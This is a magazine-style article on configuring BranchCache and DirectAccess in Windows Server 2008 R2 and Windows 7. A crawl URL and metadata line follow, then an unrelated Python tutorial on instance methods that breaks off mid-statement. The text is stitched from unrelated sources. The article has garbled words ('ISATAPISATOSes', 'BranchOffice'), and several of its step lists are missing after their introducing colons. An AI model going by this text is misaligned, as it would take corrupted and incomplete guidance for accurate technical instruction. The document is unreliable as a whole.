While the unwashed masses finally have their first peek at Windows Server 2008 R2 and Windows 7, the chosen ones have been working with the release candidate (RC) code since May and the release to manufacturing (RTM) version since August. Whichever group you’re in, you probably have been inundated with hype. Maybe you were invited to a Windows 7 preview “house party,” like me, for example. (My son-in-law hosted one, but only because he wanted the software free from Microsoft.) Even if you were spared that major hype, you couldn’t have avoided each of the many media reports extolling or questioning the new features of these products, both of which are from a new code tree and constitute new ISATAPISATOSes. BranchCache and DirectAccess, arguably the crown jewels of these releases, are worth your attention. With BranchCache, Microsoft aims to give branch employees the same experiences working with files as their peers at the corporate office. With DirectAccess, Microsoft targets remote users connecting to corporate networks via virtual private networks (VPNs). As is typical with Microsoft, you only get the good stuff on the new products. In this case, you can only implement BranchCache DirectAccess to Windows 7 clients and 2008 R2 servers. Let’s take a deeper look at each of these new features. BranchCache improves the branch office experience by caching commonly used files locally, either on a Windows Server 2008 R2 server or user workstations, rather than forcing users to access files via centrally located network shares. BranchCache is cool, but there are caveats. IT can deploy BranchCache in Distributed Cache Mode or Hosted Cache Mode (see Figure 1). IT configures the mode via Group Policy, so using hosted mode at one office and distributed mode at another requires implementing two policies and planning organizational unit (OU) structures accordingly. Microsoft recommends deploying Distributed Cache Mode in sites of 50 or fewer clients, but it will depend on speed and bandwidth of the WAN link, as well as other factors. Distributed Cache Mode will require larger hard disks and perhaps memory and other resources, so at some point it will be more advantageous to use Hosted Cache Mode, especially if there’s an existing 2008 R2 server at the site. In addition, Distributed Cache Mode can only work on a local subnet. So if there are multiple subnets at a site, then a client on each subnet will have to cache the file for others on that subnet to download it. However, Hosted Cache Mode can serve multiple subnets at the site, so that would be another reason to choose Hosted Cache Mode. Figure 1 A branch office can use BranchCache in either distributed or hosted modes. In Distributed Cache Mode, no file server resides at the branch office. Instead, through policy, all user machines are BranchCache clients, that is, they all have the ability to cache documents that others in the branch site can download—if they’re the current version. For example, let’s say that Caroline requests a document, Reports.docx from a BranchCache-enabled file server in the central site. BranchCache sends metadata describing the content of the file. Hashes in the metadata are then used to search for the content in the local subnet. If not found, a copy is cached on her computer’s local drive. Later in the day, Tyler needs to modify Reports.docx so he contacts the share on the main office file server to get a copy to edit. The file server returns the metadata, then the client searches for the content, which it finds on and downloads from Caroline’s computer. This is done securely using an encryption key derived from the hashes in the metadata. The next day, Abigail needs to modify that same document. The process is the same, but she’ll be opening the copy cached on Tyler’s computer. Again, the version information is kept at the server. Clients contact the server to determine if there is a copy of the latest version at their site. This is one of three BranchCache scenarios that will come into play as users work with various documents. The other two are: In each case, the documents also save to the main office file server. That way, if Caroline comes back and wants to access the document but Abigail’s computer, which now houses the latest version, is turned off, she will receive the document from the main office server. With Hosted Cache Mode, IT configures a Windows 2008 R2 file server in the branch office with BranchCache by installing the BranchCache feature, and configuring a Group Policy to tell the clients to use Hosted Cache Mode. The procedure described for Distributed Cache Mode works the same here, but the files are cached on a locally configured BranchCache server rather than the users’ computers. Note: the content metadata maintained by the file server in the central office site is sent to each client when a file is requested from a BranchCache-enabled server. This is used to determine if any local client or server (depending on which cache mode is used) has the most recent copy. The BranchCache-enabled server at the branch site can be used for other purposes, such as a Web or Windows Server Update Services (WSUS) server. Special considerations must be made in these cases, and is described in the Microsoft BranchCache Deployment Guide and Microsoft BranchCache Early Adopter’s Guide. To configure BranchCache, you’ll need to understand how Group Policy Objects (GPOs) work and how to configure them in your OU structure to affect the computers at each site. Remember that all servers involved in the BranchCache scenario must be Windows Server 2008 R2 and all clients Windows 7. Here’s the process: Step 1. Install the BranchCache feature via Server Manager. Step 2. If you’re using BranchCache on a file server you’ll need to install the File Services Role as well as BranchCache for remote files (see Figure 2). Figure 2 A BranchCache installation requires enabling the File Services and BranchCache for remote files roles. Step 3. Configure a BranchCache GPO. Go to Computer Configuration | Policies | Administrative Templates | Network | BranchCache. You will see five possible settings: Figure 3 In the Group Policy Management Console, enable the BranchCache for branch office caching. Step 4. Configure GPO setting “LanMan Server” in the BranchCache Policy. In the same area of the GPO in Step 3, go to the LanMan Server setting and look at the properties for “Hash Publication for BranchCache.” The three options are: Servers that are running the File Services server role on 2008 R2 servers, which are desired to be BranchCache content servers, must also run the BranchCache for Network File Services role and hash publication must be enabled. BranchCache is also enabled individually on file shares. The hash publication can be enabled individually on a server (such as for a non-domain server configuration), or on groups of servers via Group Policy. Thus, BranchCache can be enabled on all shared folders, some shared folders or disabled entirely. Step 5. Configure the GPO setting in Windows Firewall to allow inbound TCP port 80 (applied to the client computer). Step 6. Once you’ve configured everything, and if the file share exists with the users’ files, go to Server Manager | File Services | Share and Storage Management. The center pane lists the shares. Right-click on the share and select Properties, then click Advanced. On the Caching tab, enable BranchCache (see Figure 4). Note: If the BranchCache option is unavailable, then the BranchCache feature wasn’t installed properly or the policy is set to disable, as noted previously. Figure 4 Enable file sharing with BranchCache using Share and Storage Management controls. By default all Windows 7 clients are enabled for BranchCache, meaning there is nothing to enable on the client itself. However, there are client-related steps that are required: Here’s what I like about BranchCache: BranchCache will certainly have its place, but beware these drawbacks: If you can justify putting a file server in the branch office, why not use Distributed File Shares (DFS)? Rather than messing around with cached files, you can use Distributed File System-Replication (DFS-R) to replicate the files and maintain a namespace with DFS. You may find advantages to caching the network files, and perhaps BranchCache will work on DFS shares. Or, perhaps you’ll find some performance boundary where the cache is more efficient than DFS-R. On the other hand, the impact on the server for BranchCache would be lower than a full-blown DFS configuration. The point is, you’ll have to study your needs, and examine the options available with BranchCache. Of course, each environment is different and what may cause problems in some branch offices won’t in others. There is no one right answer for all situations. With DirectAccess, Microsoft addresses the poor VPN experience users have had since Windows 2000, even with many improvements since the initial implementation. A DirectAccess-configured client can access an intranet site from a remote location without having to establish a VPN link manually. In addition, much to their delight, IT staffs can manage remote machines over an Internet connection rather than through the VPN. So if I’m working at home, connected to my company’s intranet, and the Internet link drops, the VPN will re-establish the connection when the Internet becomes available—without pestering me to reconnect and re-enter my credentials as I would have to do—often repeatedly—without DirectAccess. In fact, from a user’s viewpoint, DirectAccess is invisible. When a user on an enabled client clicks on the intranet link, DirectAccess handles the connection and disconnection. Users do not have to open Connection Manager, enter their credentials, wait for the connection and so on. While the remote connection is live, the user has a “split tunnel” configuration by default (see Figure 5). This enables simultaneous access to the intranet, the local network (for use of devices such as printers) and the Internet. In a typical VPN scenario without the split tunnel, connecting to the Internet means first hopping on the intranet and then passing through the corporate network gateway for connectivity. In addition, I have no access to my local network, although workarounds are possible. So again, DirectAccess is designed to give the remote user a more “in the office” experience than traditional VPN affords. Figure 5 DirectAccess enables a split-tunnel configuration for simultaneous connectivity to the corporate network and Internet. From IT’s perspective, once the computer is on the Internet (remember that DirectAccess is always enabled if it’s installed), patches, policies and other updates are easy—and secure via IPsec connections—to apply. In a basic DirectAccess configuration, the DirectAccess server is on the edge network, providing remote user connectivity to internal resources including the application servers, certificate authorities (CAs), the DNS and domain controllers (DCs). CAs and application servers must be configured to accept IPv6 traffic. Here are the essential components of a DirectAccess configuration: As you can see, DirectAccess is not for the faint of heart. The IPv6 requirement alone will undoubtedly raise concern—and require most organizations to implement transition technologies—but 2008 R2 does have the components. In addition, you have to enable security via a public key infrastructure (PKI), provide authentication services and set up IPv6 identification to application servers. Before running the DirectAccess setup wizard, you also have to configure the security groups, establish firewall policies, setup the DNS and complete a number of other prerequisites. The DirectAccess server performs a number of functions, defined through Server Manager’s DirectAccess setup wizard (see Figure 6). Figure 6 Initiate DirectAccess setup through Server Manager. The DirectAccess wizard performs four essential tasks. Through the wizard you will: As noted previously, DirectAccess clients can access the intranet directly. To enable this, you must implement the NRPT, which defines DNS servers per DNS namespace rather than per network interface. I think of this as the way conditional forwarding works on Windows 2003 and 2008 DNS servers, where you can define DNS namespaces with the appropriate IP address to connect to the server. NRPT allows a client to avoid normal DNS iteration and go directly to the DirectAccess server. Here’s how the NRPT works (see Figure 7): Figure 7 The NRPT enables definition of DNS servers per DNS namespace rather than per interface. NRPT is configured during DirectAccess setup in the Infrastructure Server Setup page and the wizard fills in the IPv6 address of the DNS server. Name Resolution Policy, a new Group Policy setting for 2008 R2, defines specific policy settings such as IPsec, DNS server and how the name resolution fallback occurs when the namespace isn’t in the queried network. You’ll find this in Computer Configuration | Windows Settings | Name Resolution Policy (note, you must enter domain namespaces with a leading dot “.”—for example, .emea.corp.net). You can expose NRPT contents using the Netsh command: Netsh name show policy. This will show the namespaces defined. Firewall exclusions will depend on how you implement the IPv6 network and if you use the transition technologies. In addition, any file or application servers the remote clients must connect to will need Windows Firewall configured appropriately. Figure 8 and Figure 9, below, show firewall exclusions for the firewall on the Internet and intranet sides of the DirectAccess server, respectively. Obviously you only need to set exclusions for technologies you are using. (Note that even though Figure 9 lists IPv4+NAT-PT, it’s not implemented by Windows 2008 R2.) Figure 8 Firewall Settings for the Internet Firewall Figure 9 Firewall Settings for the Intranet Firewall Because IPv6 permits DirectAccess clients to maintain continuous connectivity to resources on the corporate network, they must all run the protocol. Even if you have a fully implemented IPv6 network, allowing remote connectivity may require use of a transition technology that would allow the DirectAccess client to connect to IPv4 resources by encapsulating IPv6 inside of IPv4 packets. These technologies include 6to4, IP-HTTPS and Teredo. ISATAP also is an encapsulation technology but is only used internally. I won’t go into detailed descriptions here, but Figure 10 shows basic connectivity options. Figure 10 Preferred Connection Options for DirectAccess Clients Source: Microsoft On the intranet side, without native IPv6, DirectAccess permits use of ISATAP, which generates an IPv6 address from an IPv4 address and implements its own neighbor discovery. ISATAP allows DirectAccess clients to access resources on an IPv4 network. For example, when an ISATAP client boots, it must find an ISATAP router. It does this by issuing a DNS query for ISATAP.<domain name>. So for Corp.net it would look for ISATAP.corp.net.. You also can implement 6to4 individually on hosts or over an entire network and transmit IPv6 packets over an IPv4 network. Interestingly, if 6to4 is implemented for an entire network, it requires only one IPv4 address. It does not support traffic between IPv4 and IPv6-only hosts. Teredo also provides IPv6 packets to be routed to IPv4 networks, but is used when the client is behind a Network Address Translation (NAT) server that is not configured for IPv6. It stores IPv6 packets in the IPv4 datagram that allows forwarding from the NAT. Windows 7 and Server 2008 R2 have implemented a protocol called IP-HTTPS that tunnels IPv6 packets in an IPv4 HTTPS. While IP-HTTPS has poorer performance than the other protocols, you can add additional IP-HTTPS servers to improve performance somewhat. IP-HTTPS is a fairly easy protocol to enable to get the IPv6-over-IPv4 network connectivity to work. When designing the DirectAccess client configuration, you can either use DNS and the NRPT to separate Internet and intranet traffic, or you can use something called Force Tunneling and force all traffic through the tunnel. Force Tunneling, which requires IP-HTTPS, is enabled via Group Policy setting Computer Configuration\Policies\Administrative Templates\Network\Network Connections\Route all traffic through the internal network. This policy would need to apply to the DirectAccess clients. I noted previously that DirectAccess clients can access local resources while connected to the intranet. This still holds true for IP-HTTPS clients, but if the user tries to access Internet sites, for example, it would be routed through the intranet. Certainly the IPv6 requirement and complex configurations are downsides to DirectAccess, but those are easily outweighed by user experience improvements and ease of remote client management for IT. The number of remote workers, be they at a branch, in a home office or on the road, is increasing. BranchOffice and DirectAccess hold great promise for branch office and other remote workers, and IT managers and administrators would be wise to investigate them. Neither of these will be a quick and easy setup, and there are a number of options and features that are available. In addition, these features will only work on Windows 7 clients and Windows Server 2008 R2 servers, so this will definitely impact an implementation timeline. IT managers and administrators would be wise to study the Microsoft documentation available and configure it in a test lab to ensure success. Gary Olsen is a systems software engineer in HP’s Worldwide Technical Expert Center (Hewlett-Packard WTEC) in Atlanta, Ga., and has worked in the IT industry since 1981. In addition to being a Microsoft MVP for Directory Services, he’s founder/chairman of the Atlanta Active Directory Users Group and is a frequent contributor to Redmond magazine. ![CDATA[ Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use –. ]]>
http://technet.microsoft.com/en-us/ee835709.aspx
CC-MAIN-2014-15
refinedweb
2,968
51.89
Represents a homogeneous 3D line using two points. More... #include <vgl_homg_line_3d_2_points.h> Represents a homogeneous 3D line using two points. A class to hold a homogeneous representation of a 3D Line. The line is stored as a pair of homogeneous 3d points. Definition at line 25 of file vgl_homg_line_3d_2_points.h. Default constructor with (0,0,0,1) and (1,0,0,0), which is the line y=z=0. Definition at line 40 of file vgl_homg_line_3d_2_points.h. Copy constructor. Definition at line 44 of file vgl_homg_line_3d_2_points.h. Construct from two points. Definition at line 48 of file vgl_homg_line_3d_2_points.h. force the point point_infinite_ to infinity, without changing the line. This is called by the constructors Definition at line 40 of file vgl_homg_line_3d_2_points.txx. Return true iff line is at infinity. Definition at line 75 of file vgl_homg_line_3d_2_points.h. Definition at line 59 of file vgl_homg_line_3d_2_points.h. comparison. Definition at line 21 of file vgl_homg_line_3d_2_points.txx. Finite point (Could be an ideal point, if the whole line is at infinity.). Definition at line 64 of file vgl_homg_line_3d_2_points.h. Infinite point: the intersection of the line with the plane at infinity. Definition at line 66 of file vgl_homg_line_3d_2_points.h. Assignment. Definition at line 69 of file vgl_homg_line_3d_2_points.h. Are two lines concurrent, i.e., do they intersect?. Definition at line 107 of file vgl_homg_line_3d_2_points.h. Are three lines concurrent, i.e., do they pass through a common point?. Definition at line 136 of file vgl_homg_line_3d_2_points.h. Are two lines coplanar, i.e., do they intersect?. Definition at line 101 of file vgl_homg_line_3d_2_points.h. Are three lines coplanar, i.e., are they in a common plane?. Definition at line 119 of file vgl_homg_line_3d_2_points.h. Return the intersection point of two concurrent lines. Return true iff line is at infinity. Definition at line 88 of file vgl_homg_line_3d_2_points.h. Write to stream (verbose). Read parameters from stream. Return the two points of nearest approach of two 3D lines, one on each line. There are 3 cases: the lines intersect (hence these two points are equal); the lines are parallel (an infinite number of solutions viz all points); the lines are neither parallel nor do they intersect (the general case). This method handles all 3 cases. In all cases, a pair of points is returned; in case 1, the two returned points are equal; in case 2, both points are the common point at infinity of the two lines. Note that case 2 also comprises the case where the given lines are identical. Hence, when observing a point at infinity as a return value, one should interpret this as "all points are closest points". This routine is adapted from code written by Paul Bourke and available online at Return the perpendicular distance between two lines in 3D. See vgl_closest_point.h for more information. Return the perpendicular distance from a point to a line in 3D. See vgl_closest_point.h for more information. find the shortest distance of the line to the origin. Any finite point on the line. Definition at line 30 of file vgl_homg_line_3d_2_points.h. the (unique) point at infinity. Definition at line 32 of file vgl_homg_line_3d_2_points.h.
http://public.kitware.com/vxl/doc/release/core/vgl/html/classvgl__homg__line__3d__2__points.html
crawl-003
refinedweb
522
70.6
Hi Everybody, As you know, VS.NET 2008 comes with unit testing integrated within. To start with a test driven approach, we need to understand how unit testing works in VS.NET 2008. Many of us might be using already available tools / frameworks for this, viz - NUnit (Most Popular). So all those who want to shift to VS.NET 2008 unit testing, wont be unhappy. Similar kind of approach is followed in VS.NET 2008. You have to use attributes to mark-up test classes and methods. You can you Assert class for checking conditions. Some of the features are described below. Many of the features provided in NUnit, at present, are missing from this implementation. For example, you cannot test message boxes, rather UI elements, from within VS.NET 2008. So we need to wait until it is included in future releases. Targeted audience for this post is beginers who want to get a feel of test driven development 1. You can create unit test cases by writing code from scratch or using a unit test wizard. Unit test wizard does ask you some project for which unit test cases are to be generated. 2. Attributes, like in NUnit, are used to denote various test methods and test classes. 3. UI testing is not supported in the current version of unit testing with VS.NET 2008 4. You cannot run NUnit test cases from within VS.NET 2008. You will need separate EXE to do that (The NUnit framework) Steps required for writing unit test cases in VS.NET 2008 1. Create new class representing a unit test case. The attribute used is � TestClass. For example � [TestClass()] public class Window1Test You can do this by either writing the code yourself or generating it through the wizard. 2. Create new test methods. The attribute used is � TestMethod. For example � [TestMethod()] public void Window1ConstructorTest() If you have generated test cases through wizard, most of the test methods are generated for you automatically. If you want, you can always add some custom test methods as s hown above. 3. To check some condition, Assert class is available with all kind of static methods. If the condition is false, exception will be thrown with error message provided by you. For example � Assert.IsFalse(blnSample, "The boolean value should not be true."); The meaning of this statement is, if �blnSample� boolean value is true, throw exception with "The boolean value should not be true." as exception message. Other attributes, which can be used are � 1. Use ClassInitialize to run code before running the first test in the class [ClassInitialize()] public static void MyClassInitialize(TestContext testContext) { } 2. Use ClassCleanup to run code after all tests in a class have run [ClassCleanup()] public static void MyClassCleanup() { } 3. Use TestInitialize to run code before running each test [TestInitialize()] public void MyTestInitialize() { } 4. Use TestCleanup to run code after each test has run [TestCleanup()] public void MyTestCleanup() { } How to run unit test cases you have written ? There is a separate menu provided for unit testing, named Test. Under this menu, a sub menu, Run is available, using which you can run tests within current context or all tests within current solution. Please see the screen shot for clear understanding. Where to see test execution results ? Like the error list, task list, immediate window or breakpoints window, Test Results window appear at the bottom of the VS.NET 2008 screen. See screenshot below.
http://www.codeproject.com/KB/tips/unittestingvsnet2008.aspx
crawl-002
refinedweb
574
67.86
For most cases this will result in no pointer change at all and a simple adjustment of the allocated length - usually out into free space in most use-cases on a small system like this. So is there anything in the external programming that can be done to free the no longer used allocated memory space? Perhaps enable the WDT, let if time out, and have the sketch start all over? Andy Brown, I think you will find that Nick knows more about the code than you credit. And he isn't given to make unfounded claims. #define free myfree But the bug in question is something to do with the first (or last?) allocated block not being freed correctly, or something like that. global variables work better for me and I haven't heard of a good reason I should avoid them in my Arduino sketches.Lefty //A global int i = 666; template <typename T> struct Base{ Base( int i_NewVal ) : i( i_NewVal ) {return;} int i; }; template <typename T> struct Squared : public Base<T>{ Squared( int i_NewVal ) : Base<T>( i_NewVal * i_NewVal ) {return;} T Result() { return i; } }; void setup() { Squared< long > s_Square( 2 ); Serial.begin( 9600 ); Serial.print( "2 squared = " ); Serial.print( s_Square.Result() ); return; } void loop(){return;} int i = 666; //A global int i = 666; void setup() { int i = 2 * 2; Serial.begin( 9600 ); Serial.print( "2 squared = " ); Serial.print( i ); return; } void loop(){return;} As a minimum, place the global in a namespace so it has to be explicitly used. You sketch is not about globals, rather it warns of the perils one faces by using poorly named variables template <typename T> struct Squared : public Base<T>{ Squared( int i_NewVal ) : Base<T>( i_NewVal * i_NewVal ) { return; } T Result() { return Base<T>::i; }}; Please enter a valid email to subscribe We need to confirm your email address. To complete the subscription, please click the link in the Thank you for subscribing! Arduino via Egeo 16 Torino, 10131 Italy
http://forum.arduino.cc/index.php?topic=124367.30
CC-MAIN-2017-09
refinedweb
327
71.04
How To Configure WebDAV Access with Apache on Ubuntu 14.04 Introduction WebDAV is an extension of the HTTP protocol that allows users to manage files on servers. There are many ways to use a WebDAV server. For example, you can share Word or Excel documents with your colleagues by uploading them to your WebDAV server. You can even share your music collection with your family and friends by simply giving them a URL. All this can be achieved without them installing anything. There are many ways to manage files on a remote server. WebDAV has several benefits over other solutions such as FTP or Samba. In this article, we will go through how to configure your Apache server to allow native WebDAV access from Windows, Mac, and Linux with authentication. Why WebDAV? WebDAV offers several advantages: - Native integration on all major operating systems(Windows, Mac, Linux); there is no need to install third party software to use WebDAV. - Support for partial transfers. - More choices for authentication. Being on HTTP means NTLM, Kerberos, LDAP, etc. are all possible. Depending on your situation, WebDAV may be the best solution for your needs. Why Apache? There are many web servers around that support WebDAV on Linux. However, Apache has the most compliant implementation of the WebDAV protocol out there. At the time of writing, WebDAV on Nginx and Lighttpd works, but only partially. Prerequisites You'll need a Ubuntu 14.04 server. Before we start, let us first create a user with sudo access. You can run commands as root, but it is not encouraged due to security concerns. There is an excellent article on adding users on Ubuntu 14.04 should you wish to learn more. Creating a User When you first create a Digital Ocean instance, you will be given credentials that allows you to log in as root. As root, let us first add a user called alex. adduser alex You will be prompted to create a password for the user alex as shown below. There will be further prompts for information about the user alex. You may enter them if you wish. Adding user `alex' ... Adding new group `alex' (1000) ... Adding new user `alex' (1000) with group `alex' ... Creating home directory `/home/alex' ... Copying files from `/etc/skel' ... Enter new UNIX password: Retype new UNIX password: passwd: password updated successfully Changing the user information for alex Enter the new value, or press ENTER for the default Full Name []: Room Number []: Work Phone []: Home Phone []: Other []: Is the information correct? [Y/n] y Granting sudo Privileges to the User After creating a new user, the next step is to grant the user alex sudo privileges. Assuming you are still logged in as root, add the user alex to the sudo group by typing in the following command. usermod -aG sudo alex Users in the sudo group are granted sudo privileges. Now you can log out and log in as the user alex. Step One — Installing Apache Let us get Apache installed. sudo apt-get update sudo apt-get install apache2 The Apache web server should be installed and running. Step Two — Setting Up WebDAV There are three steps to set up WebDAV. We designate a location, enable the necessary modules, and configure it. Preparing the Directory We need to designate a folder for serving WebDAV. We'll create the new directory /var/www/webdav for this. You will also need to change the owner to www-data (your Apache user) in order to allow Apache to write to it. sudo mkdir /var/www/webdav sudo chown -R www-data:www-data /var/www/ Enabling Modules Next we enable the WebDAV modules using a2enmod sudo a2enmod dav sudo a2enmod dav_fs The Apache modules are found under /etc/apache2/mods-available. This creates a symbolic link from /etc/apache2/mods-available to /etc/apache2/mods-enabled. Configuration Open or create the configuration file at /etc/apache2/sites-available/000-default.conf using your favorite text editor. nano /etc/apache2/sites-available/000-default.conf On the first line, add the DavLockDB directive configuration: DavLockDB /var/www/DavLock And the Alias and Directory directives inside the VirtualHost section: Alias /webdav /var/www/webdav <Directory /var/www/webdav> DAV On </Directory> The file should look like this after editing. DavLockDB /var/www/DavLock /var/www/webdav <Directory /var/www/webdav> DAV On </Directory> </VirtualHost> # vim: syntax=apache ts=4 sw=4 sts=4 sr noet: sudo service apache2 restart Testing WebDAV without authentication allows only read access for the users. For testing, let us create a sample file. echo "this is a sample text file" | sudo tee -a /var/www/webdav/sample.txt A text file called sample.txt should be created in /var/www/webdav. It should contain the text this is a sample text file. Now we can try logging in from an external computer. The WebDAV server should be found at http://<your.server.com>/webdav. For the sake of brevity, we are only showing how to log in without credentials on a Mac. On Mac, open Finder. On the menu bar, find Go and select the option Connect to Server. Select the Connect as Guest option. Then, click Connect. You should be logged in. If you connect to that shared file system and enter the webdav folder, you should be able to see the file sample.txt that was created earlier. The file should be downloadable. Step Three — Adding Authentication A WebDAV server without authentication is not secure. In this section we'll add authentication to your WebDAV server using the Digest authentication scheme. Basic or Digest Authentication? There are many authentication schemes available. This table illustrates the compatibility of the various authentication schemes on different operating systems. Note that if you are serving HTTPS, we are assuming your SSL certificate is valid (not self-signed). If you are using HTTP, use Digest authentication as it will work on all operating systems. If you are using HTTPS, you have the option of using Basic authentication. We're going to cover the Digest authentication scheme since it works on all the operating systems without the need for an SSL certificate. Digest Authentication Let us generate the file (called users.password) that stores the passwords for the users. In Digest authentication, there is the realm field which acts as a namespace for the users. We will use webdav as our realm. Our first user will be called alex. To generate the digest file, we have to install the dependencies. sudo apt-get install apache2-utils We are going to add users next. Let us generate the user password file using the command below. sudo htdigest -c /etc/apache2/users.password webdav alex This adds the user alex to the password file. There should be a password prompt to create the password for alex. For subsequent addition of users, you should remove the c flag. Here's another example adding a user called chris. Create a password when prompted. sudo htdigest /etc/apache2/users.password webdav chris We also need to allow Apache to read the password file, so we change the owner. sudo chown www-data:www-data /etc/apache2/users.password After the password file is created, we should make changes to the configuration at /etc/apache2/sites-available/000-default.conf. Add the following lines to the Directory directive AuthType Digest AuthName "webdav" AuthUserFile /etc/apache2/users.password Require valid-user The final version should look like this (with the comments removed). DavLockDB /var/www/DavLock <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined Alias /webdav /var/www/webdav <Directory /var/www/webdav> DAV On AuthType Digest AuthName "webdav" AuthUserFile /etc/apache2/users.password Require valid-user </Directory> </VirtualHost> The mod_authn module contains the definitions for the authentication directives. The AuthType directive instructs Apache that for the /var/www/webdav directory, there should be authentication using the Digest scheme. Digest authentication requires a value for realm which we set as webdav. Realm acts like a namespace. When you have users which have the same name, you can separate them using different values for realm. We use the AuthName directive to set the value for realm. The AuthUserFile directive is used to indicate the location of the password file. The Require directive states that only valid users who authenticate themselves are able to acess that directory. Finally, enable the Digest module and restart the server for the settings to take effect. sudo a2enmod auth_digest sudo service apache2 restart Step Four - Accessing the Files We'll demonstrate how to access your WebDAV server from the native file browsers of Mac, Windows, and Linux (Ubuntu). We are going to demonstrate file and folder operations on just the Mac for the sake of brevity, although you can add, edit, and delete files on the server from all operating systems. You can also access the files over the Internet using a web browser. You may need to eject the drive and reconnect to it if you tested it earlier before we added authentication. Mac On a Mac, open Finder. On the menu bar, find Go and select the option Connect to Server. Enter the server address. It should be http://<your.server>/webdav. Press Connect. You will be prompted for a username and pssword. three major operating systems using their native file browsers. 19 Comments
https://www.digitalocean.com/community/tutorials/how-to-configure-webdav-access-with-apache-on-ubuntu-14-04
CC-MAIN-2017-43
refinedweb
1,571
58.99
On 6/10/06, Stefan Arentz <stefan.arentz@gmail.com> wrote: > First question: What is it that connects a Quartz Job Deployment Plan > to the Quartz Job Deployer? Is it simply the xml schema namespace > defined in geronimo-quartz-0.1.xsd? Right -- the schema, and the fact that the plan was in the right place for us to find to being with. For all the deployers we've done so far, we use XMLBeans to create JavaBeans connected to the schema. Then we use XMLBeans to read in the deployment plan, and check whether it's the type this deployer expects. For example: XmlObject xmlObject; if (planFile != null) { xmlObject = XmlBeansUtil.parse(planFile.toURL()); } else { URL path = DeploymentUtil.createJarURL(jarFile, "META-INF/geronimo-quartz.xml"); try { xmlObject = XmlBeansUtil.parse(path); } catch (FileNotFoundException e) { // It has a JAR but no plan, and nothing at META-INF/geronimo-quartz.xml, // therefore it's not a quartz job deployment return null; } } if (xmlObject == null) { return null; } This part establishes that we can load a plan at all. If not, it either means no plan was provided, or the plan is in the module at a different location (e.g. WEB-INF/geronimo-web.xml). Either way, this deployer can't handle the archive so we return null. If we get past that, it means that we found a plan. So we go on to check the type: XmlCursor cursor = xmlObject.newCursor(); try { cursor.toFirstChild(); if (!SERVICE_QNAME.equals(cursor.getName())) { return null; } } finally { cursor.dispose(); } The (badly named) constant SERVICE. So far so good? Thanks, Aaron
http://mail-archives.apache.org/mod_mbox/geronimo-user/200606.mbox/%3C74e15baa0606101559x1d8b261awcf517c8ea6b5729d@mail.gmail.com%3E
CC-MAIN-2016-22
refinedweb
262
60.11
API to fetch stock data fundamentals from finanzen.net Project description Finanzen-Fundamentals Finanzen-Fundamentals is a Python package that can be used to retrieve fundamentals of stocks. The data is fetched from finanzen.net, a German language financial news site. Note that the api is English but all data will be returned in German. Installation The package will be hosted on PyPi very soon, so that you can install it via pip. If you choose to download the source code, make sure that you have the following dependencies installed: - requests - BeautifulSoup You can install both of them by running: pip install requests BeautifulSoup. Usage Import After you successfully installed the package, you can include it in your projects by importing it. import finanzen_fundamentals Retrieve Fundamentals You can retrieve the fundamentals of a single stock by running: bmw_fundamentals = get_fundamentals("bmw") This will fetch the fundamentals of BMW and save it into a dictionary called bmw_fundamentals. bmw_fundamentals will have the following keys: - Quotes - Key Ratios - Income Statement - Balance Sheet - Other The values for those keys will be variables, holding a year:value dictionary. If no data can be found, the value will be None. You can also fetch estimates for expected values by using: bmw_estimates = stocks.get_estimates("bmw") This will save estimates for the most important key metrics if available. The resulting dictionary will hold variable names as keys and a year:value dictionary as values. Note that we use stock names not stock symbols when fetching data. You can search for stock names by using stocks.search_stock("bmw", limit = 3) This will print the three most matching stock names for your search. You can increase the limit to 30. If you don't give a parameter, all available data will be printed (up to 30). Project details Release history Release notifications Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/finanzen-fundamentals/
CC-MAIN-2020-05
refinedweb
322
56.55
t = 'haystack needle haystack' # "text" - thing we search in p = 'needle' # "pattern" - thing we search for def naive(p, t): assert len(p) <= len(t) # assume text at least as long as pattern occurrences = [] for i in range(len(t)-len(p)+1): # for each alignment of p to t match = True # assume we match until proven wrong for j in range(len(p)): # for each position of p if t[i+j] != p[j]: match = False # at least 1 char mismatches break if match: occurrences.append(i) return occurrences naive(p, t) [9] t[9:9+len(p)] # confirm it really occurs 'needle' naive('needle', 'needleneedleneedle') [0, 6, 12]
http://nbviewer.jupyter.org/github/BenLangmead/comp-genomics-class/blob/master/notebooks/CG_Naive.ipynb
CC-MAIN-2018-51
refinedweb
110
58.25
In Python object-oriented programming, when we design a class, we use the instance methods and class methods. Inside a Class, we can define the following two types of methods. - Instance methods: Used to access or modify the object state. If we use instance variables inside a method, such methods are called instance methods. It must have a selfparameter to refer to the current object. - Class methods: Used to access or modify the class state. In method implementation, if we use only class variables, then such type of methods we should declare as a class method. The class method has a clsparameter which refers to the class. Also, read Python Class method vs Static method vs Instance method. After reading this article, you’ll learn: - How to create and call instance methods - how to dynamically add or delete instance methods in Python Table of contents What is Instance Methods in Python If we use instance variables inside a method, such methods are called instance methods. The instance method performs a set of actions on the data/value provided by the instance variables. - A instance method is bound to the object of the class. - It can access or modify the object state by changing the value of a instance variables When we create a class in Python, instance methods are used regularly. To work with an instance method, we use the self keyword. We use the self keyword as the first parameter to a method. The self refers to the current object. Any method we create in a class will automatically be created as an instance method unless we explicitly tell Python that it is a class or static method. Define Instance Method Instance variables are not shared between objects. Instead, every object has its copy of the instance attribute. Using the instance method, we can access or modify the calling object’s attributes. Instance methods are defined inside a class, and it is pretty similar to defining a regular function. - Use the defkeyword to define an instance method in Python. - Use selfas the first parameter in the instance method when defining it. The selfparameter refers to the current object. - Using the selfparameter to access or modify the current object attributes. You may use a variable named differently for self, but it is discouraged since self is the recommended convention in Python. Let’s see the example to create an instance method show() in the Student class to display the student details. Example: class Student: # constructor def __init__(self, name, age): # Instance variable self.name = name self.age = age # instance method to access instance variable def show(self): print('Name:', self.name, 'Age:', self.age) Calling An Instance Method We use an object and dot ( .) operator to execute the block of code or action defined in the instance method. - First, create instance variables name and age in the Student class. - Next, create an instance method display()to print student name and age. - Next, create object of a Student class to call the instance method. et’s see how to call an instance method show() to access the student object details such as name and age. class Student: # constructor def __init__(self, name, age): # Instance variable self.name = name self.age = age # instance method access instance variable def show(self): print('Name:', self.name, 'Age:', self.age) # create first object print('First Student') emma = Student("Jessa", 14) # call instance method emma.show() # create second object print('Second Student') kelly 